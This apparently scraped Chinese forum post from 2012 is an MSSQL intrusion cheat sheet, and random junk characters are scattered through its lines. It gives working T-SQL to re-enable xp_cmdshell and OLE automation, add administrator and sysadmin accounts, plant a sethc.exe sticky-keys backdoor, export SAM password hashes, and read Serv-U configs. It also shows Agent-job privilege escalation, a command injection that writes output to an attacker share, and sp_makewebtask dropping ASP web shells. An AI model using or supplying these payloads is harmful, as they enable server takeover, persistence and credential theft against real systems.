1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号6 L. V8 c( Y5 q* E+ W
恢复方法:查询分离器连接后,* e; k/ q) Z3 a' f
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
+ D" d. N8 _" W, |第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 1 S& w) p8 l5 K# V
然后按F5键命令执行完毕2 ~$ q9 c9 k) `9 _, D
: s1 y/ t. s$ I" _: I& s
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
5 G2 f( x) a' {4 p5 G- `+ I: w恢复方法:查询分离器连接后,
" k1 k8 y- u, W- O: q3 n第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell", ]6 Q" K8 f1 f* n* |7 u0 a( ]" N
第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
) _! R- K4 k# a; |8 D/ Y然后按F5键命令执行完毕5 S, G' E& |& r: q8 W% v
: b7 K3 s6 v7 O |; ~
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
" `& j$ F. u# z7 Q恢复方法:查询分离器连接后, z2 f, P' y& y, a/ V9 t
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'1 q3 s. O8 i$ @* h N* [- U+ v
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' Q) h* @: k) p
然后按F5键命令执行完毕
/ a+ i: }2 u& Z7 J
( I1 G% h% W {' p/ L4 终极方法.
% l8 V& [; {. H' C! v7 T如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:# _: t' v' A1 q* |" {! w U. D5 R
查询分离器连接后,0 Q& e5 k$ K! M% j
2000servser系统:# x- G8 W* J! ^* y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
8 p2 r! @ w M0 L, `; S+ ^2 E3 A* A! E, a& s
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'
* l1 z( R8 @5 t- T2 X2 y' o" T0 e7 k* p8 ]) M5 F
xp或2003server系统:
. V* _# _7 {* j. G2 A" {' d2 m7 o: T, G% a! z% n
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
; ^# _) l* y6 R# ~0 H6 n/ j' K8 v0 z# p q$ R, [- g0 b- z6 S) U
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
4 Q0 U$ b; w/ |. c' u' C+ u' D, G5 {; U
2 ~. n( C% J0 F* I+ m五个SHIFT8 @2 s6 Z! a s e& X( I3 Y
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
8 L/ K3 J; h5 _1 w8 _# k- f' j7 E1 n6 H, i0 l4 q
declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; + n2 ]4 [, q. Y7 x" g
4 z; w2 Q* Z. g0 @! v$ y
xp_cmdshell执行命令另一种方法- T- x* b4 u6 D+ e/ F9 }8 b
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'
$ s2 R9 Z% G( N: L
9 x& l: v& V: G/ r% y9 O: j判断存储扩展是否存在
9 T: j/ }/ {& R! C* OSelect count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'5 S2 I9 l) |6 a1 @* C
返回结果为1就OK1 G& m2 i3 V1 Y# {
- P- F8 Z, {$ ]7 D4 N- S0 M0 R" j. _- F4 i
上传xplog70.dll恢复xp_cmdshell语句:
. l0 Q0 I: H: ^) D% M' Jsp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'1 ]/ {8 v$ K" Q0 Y
( m) l; i; U" w% v4 A; v否则上传xplog7.0.dll
& i2 K u# y! U M: ~0 eExec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'
' R4 M9 a2 N$ J+ |( o
% Z! l* X( j1 Z7 K4 H5 j' a
& x& M" A& _0 A2 M) D! J
2 B I# G, h: D+ |首先开启沙盘模式:( n& Z- \" s$ y5 g! i& g! J1 t
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1; @* B5 e) C/ d
, o7 p/ L+ t# U; A
然后利用jet.oledb执行系统命令
' b% \/ A- y: a6 aselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')) D- E. E5 g+ R, V2 H( v3 C
返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了& T1 q) D$ D! X% y
" |" G1 p0 @% G) n) n
/ W- s0 j# b2 s, ~
?: | O L. G) Q5 V- P恢复过程sp_addextendedproc 如下:
! }3 J# E6 ]/ j9 R( [& rcreate procedure sp_addextendedproc --- 1996/08/30 20:13 / c, q" ?) ?& X$ @$ S5 @
@functname nvarchar(517),/* (owner.)name of function to call */
. Z' e9 z1 M/ }8 c2 O. u@dllname varchar(255)/* name of DLL containing function */ ; j ]; }* q% i
as 8 J0 O1 R6 V* K* s- e9 l5 T
set implicit_transactions off
: F/ Z6 M% `* B; l, q5 sif @@trancount > 0 2 ~: q6 b$ U& _4 \4 W5 |* }
begin
- w5 b" G* z5 r! lraiserror(15002,-1,-1,'sp_addextendedproc')
8 o6 Y* S( k% K* \; Dreturn (1)
0 {2 b* {: P* X9 _( ~. }end
" C' K# I% V" L2 gdbcc addextendedproc( @functname, @dllname)
/ D. u! r6 j7 ?+ ?3 d" k |return (0) -- sp_addextendedproc
! d! o1 C5 B2 z. ]& V& W/ r0 fGO
5 W+ y" Q: O; E
! m& ~- O+ ]6 R& d
) g3 u! n( T9 B2 I8 F/ l/ a) T3 w4 Z
导出管理员密码文件
+ ]+ ^! u* {0 i( a0 Psa默认可以读sam键.应该。
& Y2 z, h* K% a; @reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
. e. S+ v" C4 y h! _; E, ?net user administrator test
) r" ~" C" d: p: r% H3 w用administrator登陆.% d' v' b1 i+ o9 V, ~6 X# r+ A
用完机器后2 P* X7 n- H ~" p. |
reg import c:\test.reg+ }: M6 q; v6 Q6 [
根本不用克隆.
/ C7 f, d/ z2 i! J, s找到对应的sid.
# Y6 x9 }4 r2 {! Y' d* J' |4 f0 m, f- s) j* E/ f' r; k
1 [, |! J9 g# d6 i& W
1 @* L* t$ }) K' F: Q) s恢复所有存储过程- k3 z* ~* b" P! s/ B* `
use master ' f) r( B" D2 d9 A
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
7 J% f; U2 P7 N; @* Kexec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
. A" _* r7 K# P' T9 vexec sp_addextendedproc xp_loginconfig,'xplog70.dll' \0 }; z2 E8 s+ U$ f6 c1 f
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
& j' Y! z7 V2 {/ W) ]* V4 yexec sp_addextendedproc xp_getfiledetails,'xpstar.dll' % m, V0 Y9 y* i3 ~! |1 j
exec sp_addextendedproc sp_OACreate,'odsole70.dll' ( E8 D. ~7 [9 {3 _
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
/ @5 ]& P: E) R/ g) m; T( \exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
- I0 U8 W8 w$ W4 C( ]exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll' ) @( J x1 A' d) Z% j) S# O
exec sp_addextendedproc sp_OAMethod,'odsole70.dll' # y0 C$ X; Y v( a
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
0 Y: A8 {) A2 o8 ~; Sexec sp_addextendedproc sp_OAStop,'odsole70.dll' + L0 j8 q( _# x$ ~6 s8 {' b: t
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' 6 K+ |- F9 M. t7 N" L& ^5 T
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
1 u" d8 D0 `4 K3 a# T9 aexec sp_addextendedproc xp_regdeletevalue,'xpstar.dll' 6 s2 ?, T, M ]
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
+ P1 [2 X# [/ _ N. L9 b2 i8 pexec sp_addextendedproc xp_regread,'xpstar.dll' 6 H6 e% E# i @" }; h5 d9 |
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
* v; C! Z/ t4 V X+ p$ Nexec sp_addextendedproc xp_regwrite,'xpstar.dll'
5 T3 ^2 j5 J0 dexec sp_addextendedproc xp_availablemedia,'xpstar.dll'2 b, t9 {" ~# E& \) M4 j; r5 @
6 |! S/ G3 d$ s! k( K( f5 j
2 S3 U/ U4 M5 w建立读文件的存储过程
9 [0 K4 |. p) M& @0 e- gCreate proc sp_readTextFile @filename sysname
# a0 w0 v5 N8 Bas
; r& s% C) c# M2 f/ y z2 f7 x, }* J _$ l! s5 B! I
begin
" e" `+ H3 u* {9 F. d& b. p set nocount on
, S- L: \$ A" J Create table #tempfile (line varchar(8000))
, g1 h# k3 S( j! Y/ U* |. p) k exec ('bulk insert #tempfile from "' + @filename + '"')
% k$ v4 O7 ^3 H; F/ Z+ f select * from #tempfile
7 M7 m3 ]3 b) q8 F drop table #tempfile
' a h9 W6 ^$ g" w$ T8 HEnd/ v9 E6 W9 b8 F1 G$ V; Z1 j
# ^6 H/ m( q/ o& ~: A
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件
) H' @9 I5 d. F) {查看登录用户
. z4 D. @ H# kSelect * from sysxlogins
: l3 }( f5 h8 ]; X- L% H$ o
4 s3 i5 Q: D' _: i" c把文件内容读取到表中9 Z% b2 d& f, P" s# k
BULK INSERT tmp from "c:\test.txt"
: N0 J( W9 H! d( [4 pdElete from 表名 清理表里的内容
: Y6 }: I+ c: H, E, F2 \create table b_test(fn nvarchar(4000));建一个表,字段为fn
$ N2 ^" Z/ b8 \( Q
& L. [5 V1 W( z8 e* n0 d \2 S% C
/ {5 |% E P7 _加sa用户0 R' j: `, O, `( o+ t
exec master.dbo.sp_addlogin user,pass;& _$ b- ~5 F2 D, F$ S2 ^4 Y0 v1 O: v
exec master.dbo.sp_addsrvrolemember user,sysadmin
$ O. v4 ~0 @ V+ j; ]
, M5 ?+ L7 \" B8 |$ ?3 I$ [0 Z
9 b( s4 X3 [ V d: N
/ V# ^( V+ s6 S读文件代码; n# A- R5 n2 ~& f. {- G
declare @o int, @f int, @t int, @ret int3 w: t& Z. j" p" m x1 z$ \
declare @line varchar(8000)
' F8 O# D, L4 ?1 K4 j' ~6 X) oexec sp_oacreate 'scripting.filesystemobject', @o out1 F. C) x$ ^& H# r7 H
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 17 ]2 V2 J) @; n/ n p# K4 \
exec @ret = sp_oamethod @f, 'readline', @line out
1 s G5 X' h( C2 m5 F. Q1 V1 r# o+ Uwhile( @ret = 0 )
1 |9 C3 r, U% P; z9 Zbegin
$ A5 V$ X4 b! T; Q' o1 [9 w; H. X0 ^print @line+ M, @/ l. O! |5 E$ \; N' p
exec @ret = sp_oamethod @f, 'readline', @line out9 ]& e S& ?6 g0 R6 G% z$ m
end$ B. ^" x7 W' J' n7 ]0 a- J
+ }- N' J- b, t, t
- r8 e: Z" T2 j3 T3 h2 |0 l$ W, ^
写文件代码:. S6 [1 |1 c; _4 a
declare @o int, @f int, @t int, @ret int- }* k/ X4 ?* }! v' m3 _- p2 F
exec sp_oacreate 'scripting.filesystemobject', @o out* a8 y% V, w/ b( L
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1
0 H. l$ f1 H0 x8 s0 Texec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》
' G, M. j' ?* m7 K
* Q8 @# w" O' j2 X0 c5 D7 L" ~, q+ F1 {3 Q, _
添加lake2 shell
! B J B3 h% r i3 C3 ysp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'1 H. k! x2 P9 X5 h. S) N
sp_dropextendedproc xp_lake2
6 ~& ~9 @! C6 a0 wEXEC xp_lake2 'net user'; z! L% Z; `! l$ Y1 D
! n: J8 d8 a1 w- R
K7 `8 c, w( w8 `" R- R9 V: o1 w得到硬盘文件信息 : ^/ R8 @0 n* n: z6 I* D3 L* v, P
--参数说明:目录名,目录深度,是否显示文件
2 Z( N: E! t, H8 Oexecute master..xp_dirtree 'c:'
z; e7 ?/ q8 A/ B3 Fexecute master..xp_dirtree 'c:',1
' l4 y# A: Z7 h* \% e7 g% ~# Nexecute master..xp_dirtree 'c:',1,1 e7 u; r* i8 _
. G: X9 M* }3 Q8 ]
t) s6 z- R) `- z0 q0 x* R8 @
读serv-u配置信息+ T" N% u8 i5 C7 C7 r3 |
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'1 q8 Q' k C: ~7 N8 R
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'
c3 G6 G: }, W- Q$ z/ V! h* G" O% Q+ S0 M( E. A9 ^* l+ W
通过xp_regwrite写SHIFT后门) A3 k7 [/ v( Q l9 T+ W
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--
2 c) F8 N8 y8 S' M5 s Q4 r& w( j, t2 p
' g4 q5 O% n: S. ~4 E9 U3 m& z+ u. O- K8 m3 ^# ^' y( h
找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';
, B# O9 F! m# wexec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了2 r+ V' d; ^8 x
" _% F" J( _ k: U; h0 H1 ?$ l: N
EXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
! F& Q& X) n; g6 N b1 X: c, \/ k5 l0 Z# `( \$ r( g
: w, m2 p; L; j5 A& z7 K# J/ F, y3 M( n/ G9 l
sql server 2005下开启xp_cmdshell的办法
, @; @4 q0 k& Z0 f
' M) b' j, d* ^8 bEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;* r' Y5 C7 J0 Y) C7 `, P1 h/ p7 I2 c
], j6 J" s, E! N# vSQL2005开启'OPENROWSET'支持的方法:, x5 X0 ~# L6 R1 F8 U M: G6 M
6 y* z( U# c+ g8 xexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
0 M7 G% J0 K' r1 b( v$ n8 Q- G" a/ h1 S) R2 _$ V# w% a" K
SQL2005开启'sp_oacreate'支持的方法:
* i! D3 L; `) \) J- k+ ^
u! }- M1 }: i4 A Kexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;7 y) P9 c2 X. `! X; T, d
3 j6 L+ z9 G! N% `1 @
& N: |* ]$ U9 J9 K4 A! [
6 l( p1 P& W2 \ ~3 w2 y* \
1 b7 W+ Y, z6 r/ P, A! i5 a1 i9 ~5 b# A7 Z) |' t. B
, [+ M9 A: H- l* K2 g) ^" v8 O) c( r7 s% z
8 Y1 P+ T8 V& n5 K7 u3 Z, a: E! ~
) i H, D" g$ ^- |/ O* ]
0 U* l7 K U: ~8 C1 D# \; C3 @; j3 [+ L) a
( k: |$ e& s+ _$ z- ?6 r" s
0 W# w0 Y0 P) Y" w) v+ N
% f, ?# v& A7 `+ v/ U( e
. I* R' Q1 s/ J2 H% W6 D! _6 n* j' ]1 |
1 _* m/ C: P1 A% n- q }7 }# l
o8 L' p& e4 N U v' V
" r: f/ B ^5 z3 w+ J4 Z [1 |" O& v+ _+ t3 E! L7 w5 _
3 o* o0 m& j+ o# U& J
, K( N: W4 a. p! |* _
% K b. N( g7 X' l3 y8 u
3 Y4 X' u* A7 [+ H0 s! J以下方面不知道能不能成功暂且留下研究哈: B! V2 [( p% N1 p
4)
) {& o2 ?6 [& ^. J' x4 G* uuse msdb; --这儿不要是master哟6 b8 Q3 q0 Y/ |- k {( f
exec sp_add_job @job_name= czy82 ;
1 l, M5 H g* C b8 gexec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;
" Y5 _' _4 n2 S0 Z3 ?1 J2 |exec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;5 m- J1 k' I& B+ f3 _ o2 o
exec sp_start_job @job_name= czy82 ;, M6 K8 o6 t: g' f9 Z8 O0 y5 g
J. y+ H) s! |/ y4 \$ E# K
利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以
2 G- D0 V \9 ~" p; r执行tsql语句了.* s& l8 z+ y/ i: G
对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名
7 e8 T& r! q+ k# Z- z# Z3 T2 T$ a8 ^& @3 a第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)
6 T' R( {) X$ T) U# Pnet start SQLSERVERAGENT/ s: ?) \9 O6 I9 L
7 C6 Y# s J6 O* a9 V0 B! q
对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的+ v5 e _) K( P# Z
USE msdb! B2 k. U7 X" a
EXEC sp_add_job @job_name = GetSystemOnSQL ,
( W( N) |1 r* t7 s- Y@enabled = 1,# h9 J8 a6 y. v$ v
@description = This will give a low privileged user access to
5 \; \. l( u8 [; E0 Oxp_cmdshell ,4 ]/ Y5 O' U& H
@delete_level = 12 Z/ ^) X7 P2 B0 J* B! I
EXEC sp_add_jobstep @job_name = GetSystemOnSQL ,
6 R1 X" y8 e, i, y& }" K. U( g3 n0 r@step_name = Exec my sql ,
# r7 U, C1 e, q) e* Q0 S@subsystem = TSQL ,
8 ?- k- @! c5 O* J: @7 L; S; X@command = exec master..xp_execresultset N select exec& j4 F- b2 f9 b5 y. p; y' W
master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master . ?$ G( P9 t) h! ?" e! X+ d
EXEC sp_add_jobserver @job_name = GetSystemOnSQL ,6 Y' J- w- i: ^
@server_name = 你的SQL的服务器名 $ ?0 G' g7 {- V+ {) |* S( e( s
EXEC sp_start_job @job_name = GetSystemOnSQL
9 q1 N( k" C% P+ A) I2 |' Q$ n" A# m' c
不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
& H- X2 ]' }8 O2 W3 ?& H, b! Q# q* X才让我们可以以public执行xp_cmdshell
* H& }) n" b1 c; d( V
2 P: \; l( n2 }; @- m" R5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以) {2 p4 a" n1 Z5 G
在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968 ?# p" a* w/ b
3 P5 e0 ], F+ a* k: p6 \
USE msdb
2 t; Q: k# e3 J" J0 t2 b& L: SEXEC sp_add_job @job_name = ArbitraryFilecreate ,. m" O+ G- |4 S! x1 h& z, y
@enabled = 1,
9 W6 R, Z& R9 L; `@description = This will create a file called c:\sqlafc123.txt ,# R" _0 N, e- I `
@delete_level = 1
0 P0 b3 B. y' A' N8 ?' o- I& MEXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
F- s1 y( r' @% S% K2 @@step_name = SQLAFC ,! \) S- l" K: ]& p& A! M$ s# _* K
@subsystem = TSQL ,
. d# z6 Z4 T" e* i) T( G$ T- |! u@command = select hello, this file was created by the SQL Agent. ,: d! e" {( P% R
@output_file_name = c:\sqlafc123.txt 8 R2 @& `! x1 ?& D- ?+ E! |8 S
EXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,
2 a9 \" K: c& v' W- ~& o2 x6 V@server_name = SERVER_NAME
1 u8 Q- u% }) O& N, c0 R9 BEXEC sp_start_job @job_name = ArbitraryFilecreate
7 q" x3 S! J0 w6 s$ M6 O$ j8 w8 B/ Q( Y; y0 i
如果subsystem选的是:tsql,在生成的文件的头部有如下内容 Q3 a) S1 y; I' s% b
3 l( M! B; U' X0 C3 w
??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19
3 B+ a; L8 ^* W# ? p' [! d----------------------------------------------
, S* a/ }' M. k7 d1 Z0 z; N) X1 ]# hhello, this file was created by the SQL Agent.
. S+ t; r( p+ X$ b0 S1 d; E, {; L% R# u3 n3 [4 u* Y" _0 i. _7 Z* G
(1 ?????)
# e/ ]4 G2 ^& t: Q: q& L7 a) o5 A6 |' x# h/ [" \3 j
所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员
9 ~6 b9 S# @8 I$ L$ c命令的vbs文件到启动目录!
* O7 W7 x* b1 y" U# E9 S7 p, y* h
6)关于sp_makewebtask(可以写任意内容任意文件名的文件)
* \! T1 n2 a1 e! _关于sp_MScopyscriptfile 看下面的例子
1 d+ W. I5 d1 L5 z; cdeclare @command varchar(100) 9 }- i, S" Z" [
declare @scripfile varchar(200)
5 @6 ^& k2 h. g% n, s: U: fset concat_null_yields_null off
, P. u2 a" g+ _& r0 R$ g; }9 yselect @command= dir c:\ > "\\attackerip\share\dir.txt" $ K: p1 T$ E4 k: D& I) w
select @scripfile= c:\autoexec.bat > nul" | @command | rd " B3 a! _! |6 G7 d. t0 ]
exec sp_MScopyscriptfile @scripfile , ( N, U7 b" ]8 ^
+ X. `) e5 L) U( f8 p这两个东东都还在测试试哟
& J' n! p3 j5 u- E% e _让MSSQL的public用户得到一个本机的web shell
. V8 r7 s/ L) v) @3 M# B a- |% x% X7 R" P' A
sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,
: h. G) s7 i( Z( w8 i--@query= select <img src=vbscript:msgbox(now())>
( \3 A* t0 W) t: E$ N8 V! H, d% s--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%> * p) z0 [0 I8 R5 p* a* e8 t
@query= select
6 |: n0 a' S4 x: p<%On Error Resume Next B( `) Z) Q$ ]; `- k6 W8 e! A. e
Set oscript = Server.createObject("wscript.SHELL")
% l' E# A$ I, ]8 `Set oscriptNet = Server.createObject("wscript.NETWORK") 7 f; Q; K" L2 C! F+ G) [4 c
Set oFileSys = Server.createObject("scripting.FileSystemObject")
5 y( v5 A5 T3 N8 {szCMD = Request.Form(".CMD")
# t, z7 `# g/ b) i- ^If (szCMD <>"")Then - L2 y+ A. K9 a) }
szTempFile = "C:\" & oFileSys.GetTempName()
. o" Z- A- F6 C! o5 hCall oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) ; T& T; W' j4 |
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
) B9 {9 L3 e3 ^( T& S6 @End If %> * {; L- C# S' c8 q0 k8 e7 L
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST"> / b. N2 J7 g1 i1 g) n: o
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
6 {: M3 ^% \2 T4 X6 r& N</FORM><RE> 4 v3 w/ I/ d0 k
<% If (IsObject(oFile))Then * G) Y @6 P, `( \, Q3 J7 q o
On Error Resume Next 3 K/ q3 e3 P" v, X1 t
Response.Write Server.HTMLEncode(oFile.ReadAll) & ?+ P- z( x2 C3 h& {0 r
oFile.Close ! j- _4 S$ H) b) p1 |% k
Call oFileSys.deleteFile(szTempFile, True)
: l0 L( L5 a& Y4 X& UEnd If%> ) e4 E* h, {1 S2 L: n* S
</BODY></HTML>
: W" A4 M+ A8 f4 ? |
发表于 2012-9-15 14:37:30
收藏
支持
反对